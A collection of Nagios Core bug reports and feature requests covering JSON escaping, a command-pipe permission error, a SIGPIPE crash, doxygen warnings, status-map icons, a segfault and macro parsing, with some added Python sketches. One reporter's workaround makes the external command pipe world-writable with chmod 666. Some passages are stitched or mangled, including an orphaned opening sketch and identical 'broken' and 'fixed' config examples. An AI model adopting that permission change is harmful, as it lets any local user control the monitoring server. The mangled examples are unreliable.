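A build helper could check for such tools up front instead of failing halfway through 'make all'. The following is a minimal Python sketch using only the standard library. `missing_tools` is an illustrative name, and the list of required tools is an assumption based on this report alone.

```python
import shutil

def missing_tools(tools):
    """Return the tools from the list that are not found on PATH."""
    return [tool for tool in tools if shutil.which(tool) is None]

# unzip is the tool this report found missing on CentOS 6.6.
print(missing_tools(["unzip"]))
```

An empty list means every listed tool was found. Any names printed would need to be installed before building.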

json service list not escaped

http://nagios.server/nagios/cgi-bin/statusjson.cgi?query=servicelist produces some invalid json for my configuration:

{ "format_version": 0, "result": { "query_time": 1403606999000, "cgi": "statusjson.cgi", "user": "pricechild", "query": "servicelist", "query_status": "beta", "program_start": 1403606521000, "last_data_update": 1403606990000, "type_code": 0, "type_text": "Success", "message": "" }, "data": { "selectors": { }, "servicelist": { "windowsserver1": { "C:\ Drive Space": 2, "Host Alive": 2, "Memory Usage": 2, "NSClient++ Version": 2 }, } } }

The backslash in "C:\ Drive Space" should be escaped?

This service was created with service_description C:\ Drive Space which I think has been allowed so far.

I imagine there may be further escaping issues to find?
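For reference, here is a minimal Python sketch of the string escaping a JSON emitter needs to apply. It is not the statusjson.cgi code; `json_escape` is a hypothetical helper written for illustration, and it only covers the quote, the backslash, and control characters.

```python
import json


def json_escape(text):
    """Return text as a quoted JSON string (hypothetical helper, illustration only)."""
    out = []
    for ch in text:
        if ch == '"':
            out.append('\\"')          # a quote would end the string early
        elif ch == '\\':
            out.append('\\\\')         # a lone backslash starts an escape sequence
        elif ord(ch) < 0x20:
            out.append('\\u%04x' % ord(ch))  # control characters must be escaped
        else:
            out.append(ch)
    return '"' + ''.join(out) + '"'


# The service description from this report, containing one backslash.
description = "C:\\ Drive Space"
encoded = json_escape(description)

# A standard parser should read the escaped form back unchanged.
decoded = json.loads(encoded)
```

With this escaping, the key is written with a doubled backslash, which a JSON parser reads back as the original service description.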

init script bug

Using CentOS 6.5, after installation, Nagios 4.0.8 fails while attempting to run a service check with:

"Could not open command file '/usr/local/nagios/var/rw/nagios.cmd' for update!"

To fix this, I have to run the following while Nagios is running:

chmod 666 /usr/local/nagios/var/rw/nagios.cmd

To do this automatically at every 'service nagios start', I've added it to the init script with:

sed -i '/$NagiosBin -d $NagiosCfgFile/a (sleep 10; chmod 666 \/usr\/local\/nagios\/var\/rw\/nagios\.cmd) &'  /etc/init.d/nagios

I'm sure you can find a more proper fix, but this is what works on CentOS 6.5.

Command worker fails to handle SIGPIPE

On a loaded Nagios server, a process can write an external command and terminate before it gets a response back. The write call in https://github.com/NagiosEnterprises/nagioscore/blob/master/base/commands.c#L222 then causes a SIGPIPE that is not handled:

Program received signal SIGPIPE, Broken pipe.
0x00007fe4d18bffd0 in __write_nocancel () at ../sysdeps/unix/syscall-template.S:82
82  in ../sysdeps/unix/syscall-template.S
(gdb) bt
#0  0x00007fe4d18bffd0 in __write_nocancel () at ../sysdeps/unix/syscall-template.S:82
#1  0x00007fe4d22e5eb1 in command_file_worker (sd=47) at commands.c:222
#2  launch_command_file_worker () at commands.c:290
#3  0x00007fe4d22d274f in main (argc=<optimized out>, argv=<optimized out>) at nagios.c:787
(gdb)

After handling the signal in the debugger with (gdb) handle SIGPIPE nostop noprint pass to continue execution, things work as normal. The command worker should really handle a failing write() call back to the client.
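The general pattern can be sketched as follows. This is a Python illustration of the idea, not a patch for commands.c: ignore SIGPIPE so that a write to a vanished reader fails with EPIPE, then treat that failure as a normal, recoverable condition. `write_reply` is a hypothetical name, and a pipe stands in for the worker's socket. In C, the analogous step would be ignoring SIGPIPE and checking the return value of write().

```python
import os
import signal


def write_reply(fd, payload):
    """Write payload to fd; return False instead of dying if the reader is gone."""
    try:
        os.write(fd, payload)
        return True
    except BrokenPipeError:
        # EPIPE: the peer closed its end before the reply was written.
        return False


# Python ignores SIGPIPE by default; setting it explicitly mirrors what a
# C program would have to do on its own.
signal.signal(signal.SIGPIPE, signal.SIG_IGN)

read_fd, write_fd = os.pipe()
os.close(read_fd)                      # simulate a client that exited early
delivered = write_reply(write_fd, b"OK\n")
os.close(write_fd)
```

Here the failed write is reported to the caller, which can drop the client and keep serving others.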

"make dox" warning messages

Hi

make dox on the git master branch generates the Documentation directory, but it currently emits a few warning messages. Can these warnings be fixed?

[tjyang@fedora21 nagioscore]$ make dox
doxygen doxy.conf
/home2/tjyang/nagioscore/lib/fanout.h:66: warning: expected whitespace after [ command
/home2/tjyang/nagioscore/lib/fanout.h:65: warning: The following parameters of fanout_remove(fanout_table *t, unsigned long key) are not documented:
  parameter 'key'
/home2/tjyang/nagioscore/lib/runcmd.h:68: warning: argument 'cmdstring' of command @param is not found in the argument list of runcmd_open(const char *cmd, int *pfd, int *pfderr, char **env, void(*iobreg)(int, int, void *), void *iobregarg)
/home2/tjyang/nagioscore/lib/runcmd.h:68: warning: The following parameters of runcmd_open(const char *cmd, int *pfd, int *pfderr, char **env, void(*iobreg)(int, int, void *), void *iobregarg) are not documented:
  parameter 'cmd'
/home2/tjyang/nagioscore/lib/squeue.h:118: warning: argument 'when' of command @param is not found in the argument list of squeue_change_priority_tv(squeue_t *q, squeue_event *evt, struct timeval *tv)
/home2/tjyang/nagioscore/lib/squeue.h:118: warning: The following parameters of squeue_change_priority_tv(squeue_t *q, squeue_event *evt, struct timeval *tv) are not documented:
  parameter 'tv'
[tjyang@fedora21 nagioscore]$ 

Map no longer loads custom icons in Nagios Core 4.1.0-rc1

I was just testing the new map features in nagios 4.1.0-rc1 and noticed all my icons are gone.

I have them defined like this:

define host{
            use                     linux-server
            host_name               somehost
    ...
            icon_image              custom/esxiserver.png
            statusmap_image         custom/esxiserver.gd2
}

This works fine in 4.0.8, where icons load everywhere (host lists, group lists, map, etc.), but in 4.1 they are gone from the map view (they still load fine in lists).

Originally reported by me here: http://support.nagios.com/forum/viewtopic.php?f=34&t=31512

Segmentation fault - RHEL 7 / CENTOS 7

Hi, I tried to start Nagios 4.1RC or 4.0.8 on CentOS 7, but after starting I get this error in the messages log:

Jun 26 18:17:10 svdf01238 kernel: nagios[48797]: segfault at 0 ip 00007f29d992158c sp 00007fff782cb728 error 4 in libc-2.17.so[7f29d98a1000+1b6000]

In the debug log:

[1435353430.934346] [2048.2] [pid=48797] Processing macro 155 of 156
[1435353430.934348] [2048.2] [pid=48797] Grabbing value for macro: HOSTANDSERVICESIMPORTANCE
[1435353430.934351] [2048.2] [pid=48797] Adding macro "HOSTANDSERVICESIMPORTANCE" with value "0" to kvvec
[1435353430.934354] [001.2] [pid=48797] add_macrox_environment_vars_r() end
[1435353430.934357] [001.1] [pid=48797] add_argv_macro_environment_vars_r()
[1435353430.934370] [001.1] [pid=48797] add_custom_macro_environment_vars_r()
[1435353430.934379] [001.1] [pid=48797] add_contact_address_environment_vars_r()
[1435353430.934437] [001.0] [pid=48797] clear_volatile_macros_r()

When the process is started:

Successfully launched command file worker with pid 49466
Segmentation fault

Packages on CentOS 7:

glibc-headers-2.17-78.el7.x86_64
libcom_err-devel-1.42.9-7.el7.x86_64
glibc-common-2.17-78.el7.x86_64
libcap-2.22-8.el7.x86_64
libcap-ng-0.7.3-5.el7.x86_64
glibc-2.17-78.el7.x86_64
glibc-devel-2.17-78.el7.x86_64
libcom_err-1.42.9-7.el7.x86_64

command_line with $ breaks $ARGn$ macros

A basic auth password had a single $ in it. This led to unexpected breakage of $ARGn$.

define service {                                                                                      
  service_description example.com-exceptions                                                         
  host example.com                                                                         
  use generic-service                                                                                 
  check_command check_graphite_data!sumSeries(stats.example-com-*.action_controller.status.5*)!1!5!30
}
define command {                                                                             
    command_name check_graphite_data                                                         
    command_line echo 'http://user:[email protected]/$ARG1$' -w $ARG2$ -c $ARG3$ -s $ARG4$
}

The above configuration snippet generated the following:
[Screenshot: screen shot 2015-06-29 at 6 12 54 pm]

I expected:

echo 'http://user:[email protected]/sumSeries(stats.example-com-*.action_controller.status.5*)' -w 1 -c 5 -s 30

After a deep dive in the docs, the only indication I found that this might be illegal was http://nagios.sourceforge.net/docs/nagioscore/4/en/configmain.html#illegal_macro_output_chars

But I don't think that applies as it pertains to generated characters from macros rather than characters that might be interpreted as macros.

I tried escaping $ to no avail, e.g.

define command {                                                                             
    command_name check_graphite_data                                                         
    command_line echo 'http://user:pas\[email protected]/$ARG1$' -w $ARG2$ -c $ARG3$ -s $ARG4$
}

It turns out that the "fix" is to write $$. I can find no documentation on escaping $ in a command_line and believe this to be a bug as well. To make the initial example "work", you would need:

define command {                                                                             
    command_name check_graphite_data                                                         
    command_line echo 'http://user:[email protected]/$ARG1$' -w $ARG2$ -c $ARG3$ -s $ARG4$
}

I fear some future person, probably myself, might attempt to fix this "typo".
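To illustrate why a lone $ can throw off every macro after it, here is a deliberately simplified Python sketch of pair-based macro expansion. It is not the Nagios implementation; `expand` is a hypothetical function, the password fragments are made up, and keeping unknown $...$ text verbatim is an assumption of this sketch. The point is only that when macros are delimited by pairs of $, a stray $ shifts the pairing, while $$ is read as a literal dollar sign.

```python
import re


def expand(command_line, args):
    """Expand $ARGn$ macros; "$$" yields a literal "$" (simplified sketch)."""
    def replace(match):
        name = match.group(1)
        if name == "":
            return "$"                       # "$$" means one literal dollar sign
        arg = re.fullmatch(r"ARG(\d+)", name)
        if arg and 1 <= int(arg.group(1)) <= len(args):
            return args[int(arg.group(1)) - 1]
        return match.group(0)                # unknown text between $s is kept as-is
    # Text between one "$" and the next "$" is treated as a macro name.
    return re.sub(r"\$([^$]*)\$", replace, command_line)


args = ["x", "1"]

# Escaped dollar sign: the $ARGn$ macros pair up as intended.
escaped = expand("echo 'pa$$s/$ARG1$' -w $ARG2$", args)

# Single dollar sign: "$s/$" is taken as a macro, so ARG1 and ARG2 fall
# outside any $...$ pair and are never substituted.
broken = expand("echo 'pa$s/$ARG1$' -w $ARG2$", args)
```

In this sketch the escaped form expands to `echo 'pa$s/x' -w 1`, while the unescaped form comes back unchanged because no $ARGn$ pair is ever recognized.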

nagios --version
Nagios Core 4.0.8

If this behavior is expected, please show me the relevant doc pages and close this issue.

HOST max_check_attempts set to 1 goes SOFT and then HARD, extra check is performed

Originally reported here http://support.nagios.com/forum/viewtopic.php?f=7&t=31262&p=126275#p125754

Nagios Core 4.0.8 on CentOS 6.5

With HOST object definitions, when the max_check_attempts is set to 1, when a host goes down, it enters a SOFT state first and then a HARD state, resulting in two checks performed instead of one.

SERVICE object definitions behave correctly.
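The behaviour I expect can be sketched in a few lines of Python. This is a simplified model of the documented SOFT/HARD rule for a non-UP result, not the actual check-handling code, and `expected_state_type` is a hypothetical name.

```python
def expected_state_type(current_attempt, max_check_attempts):
    """State type expected for a non-UP (or non-OK) check result."""
    # Once the attempt counter reaches max_check_attempts, no rechecks
    # remain, so the problem state should be HARD.
    if current_attempt >= max_check_attempts:
        return "HARD"
    return "SOFT"


# With max_check_attempts set to 1, the first DOWN result is attempt 1/1.
first_down_result = expected_state_type(current_attempt=1, max_check_attempts=1)
```

Under this rule the first DOWN result at attempt 1/1 is already HARD, so no extra check should be needed.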

Here is an extract from a nagios.debug demonstrating this behaviour:

HOST Up then Down then Up

[1423605101.333215] [016.0] [pid=14074] Scheduling a forced, active check of host 'centos01' @ Wed Feb 11 08:51:38 2015
[1423605101.333277] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:51:38 2015
[1423605101.333279] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 1, Latency: 0.000050 sec
[1423605101.338902] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=HARD, OLD STATE=0, NEW STATE=0
[1423605101.338911] [016.1] [pid=14074] Host was UP.
[1423605101.338917] [016.1] [pid=14074] Host is still UP.
[1423605101.338924] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)
[1423605101.339083] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)
[1423605101.339297] [016.0] [pid=14074] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:56:41 2015

[1423605136.947174] [016.0] [pid=14074] Scheduling a forced, active check of host 'centos01' @ Wed Feb 11 08:52:10 2015
[1423605136.947324] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:52:10 2015
[1423605136.947329] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 1, Latency: 0.000134 sec
[1423605146.953117] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=HARD, OLD STATE=0, NEW STATE=1
[1423605146.953121] [016.1] [pid=14074] Host was UP.
[1423605146.953124] [016.1] [pid=14074] Host is now UP.
[1423605146.953134] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=SOFT, Final State=1 (DOWN)
[1423605146.953417] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=SOFT, Final State=1 (DOWN)
[1423605146.953462] [016.0] [pid=14074] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:53:26 2015

[1423605206.929373] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:53:26 2015
[1423605206.929383] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 0, Latency: 0.000000 sec
[1423605209.933987] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=SOFT, OLD STATE=1, NEW STATE=1
[1423605209.934000] [016.1] [pid=14074] Host was DOWN.
[1423605209.934010] [016.1] [pid=14074] Host is still DOWN.
[1423605209.934031] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=1 (DOWN)
[1423605209.938604] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=1 (DOWN)
[1423605209.938683] [016.0] [pid=14074] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:58:29 2015

[1423605294.255760] [016.0] [pid=14074] Scheduling a forced, active check of host 'centos01' @ Wed Feb 11 08:54:51 2015
[1423605294.255831] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:54:51 2015
[1423605294.255832] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 1, Latency: 0.000055 sec
[1423605294.259083] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=HARD, OLD STATE=1, NEW STATE=0
[1423605294.259085] [016.1] [pid=14074] Host was DOWN.
[1423605294.259086] [016.1] [pid=14074] Host experienced a HARD recovery (it's now UP).
[1423605294.259099] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)
[1423605294.259394] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)


Service Up then Down then Up

[1423605375.013349] [016.0] [pid=15447] Scheduling a forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 08:56:12 2015
[1423605375.042681] [016.1] [pid=15447] Service is OK.
[1423605375.042683] [016.1] [pid=15447] Service did not change state.
[1423605375.042711] [016.0] [pid=15447] Scheduling a non-forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 09:01:15 2015

[1423605389.043332] [016.0] [pid=15447] Scheduling a forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 08:56:23 2015
[1423605389.083359] [016.1] [pid=15447] Service is in a non-OK state!
[1423605389.083361] [016.1] [pid=15447] Host is currently UP, so we'll recheck its state to make sure...
[1423605389.083366] [001.0] [pid=15447] schedule_host_check()
[1423605389.083383] [016.0] [pid=15447] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:56:29 2015
[1423605389.083443] [016.1] [pid=15447] Current/Max Attempt(s): 1/1
[1423605389.083447] [016.1] [pid=15447] Service has reached max number of rechecks, so we'll handle the error...
[1423605389.083937] [016.0] [pid=15447] Scheduling a non-forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 09:01:29 2015

[1423605431.622650] [016.0] [pid=15447] Scheduling a forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 08:57:03 2015
[1423605431.665858] [016.1] [pid=15447] Service is OK.
[1423605431.665860] [016.1] [pid=15447] Service experienced a HARD RECOVERY.
[1423605431.666198] [016.0] [pid=15447] Scheduling a non-forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 09:02:11 2015

Calling html target does nothing

$ ./configure
$ make html
make: 'html' is up to date.
$ cd html && make
... extracts angular, d3 ...

Why doesn't make html work? I'm using make-4.1.

[feature-request] Notification recipients

This feature was discussed here: http://support.nagios.com/forum/viewtopic.php?f=20&t=33430
In large companies it would be very useful to know who else received a notification besides you: are you the only recipient or not?
IT managers receive e-mail notifications about business-critical services, and they want to know who will be involved in resolving the problem.
Could you please add a macro to Nagios Core that can be used in notifications in the same way as $CONTACTNAME$ or $CONTACTGROUPMEMBERS$?

Status Map icons and online/offline status dots disappear in IE11

The Nagios 4.1.0rc1 Status Map icons in Internet Explorer 11 disappear as the map loads. This is after applying the fix discovered by estanley375 (#25). I have noticed that the statusmap_icon directive in the configuration files does not add the images to the map. Instead, the Status Map seems to use the icon_image directive; I don't know if this is intentional behavior or not.

I have icon_image directives in the config files, but since there were no icons displaying in IE11, I also added the statusmap_icon directive. Unfortunately, I am still unable to see any icons on the Status Map. Furthermore, I don't see any of the red/green dots on the map which indicate the host's online/offline status. I have tried resetting my browser, cleared temporary Internet files, cookies, etc., and unchecked the Compatibility View for intranet sites (I had an issue with this because IE11, by default, throws intranet websites into Compatibility View, and our Nagios server is hosted internally)... but still no luck. IE's Developer Tools has no helpful output either.

Here's the kicker: the images are loaded successfully and display for a brief second as the map expands from a single point into the full web (using the Circular Balloon display). So I tried to change the map display, and none of them display icons or dots... except for the Circular Markup! I'm not sure what could account for this difference between the map displays.

I had created a topic on the Nagios Support Forum, which can be referenced for further information: http://support.nagios.com/forum/viewtopic.php?f=34&t=33253

Here is a screenshot of the Circular Balloon display of the Status Map after it has finished loading completely. There are no icons or online/offline status dots:
[Screenshot: no-icons-2]

Here is a screenshot of the Status Map as it initially loads. You can see that the images are successfully called, but disappear when the map finishes loading, as in the screenshot above:
[Screenshot: no-icons]

Here is a screenshot of the Circular Markup display. This is the only display that shows the icons:
[Screenshot: no-icons-3]
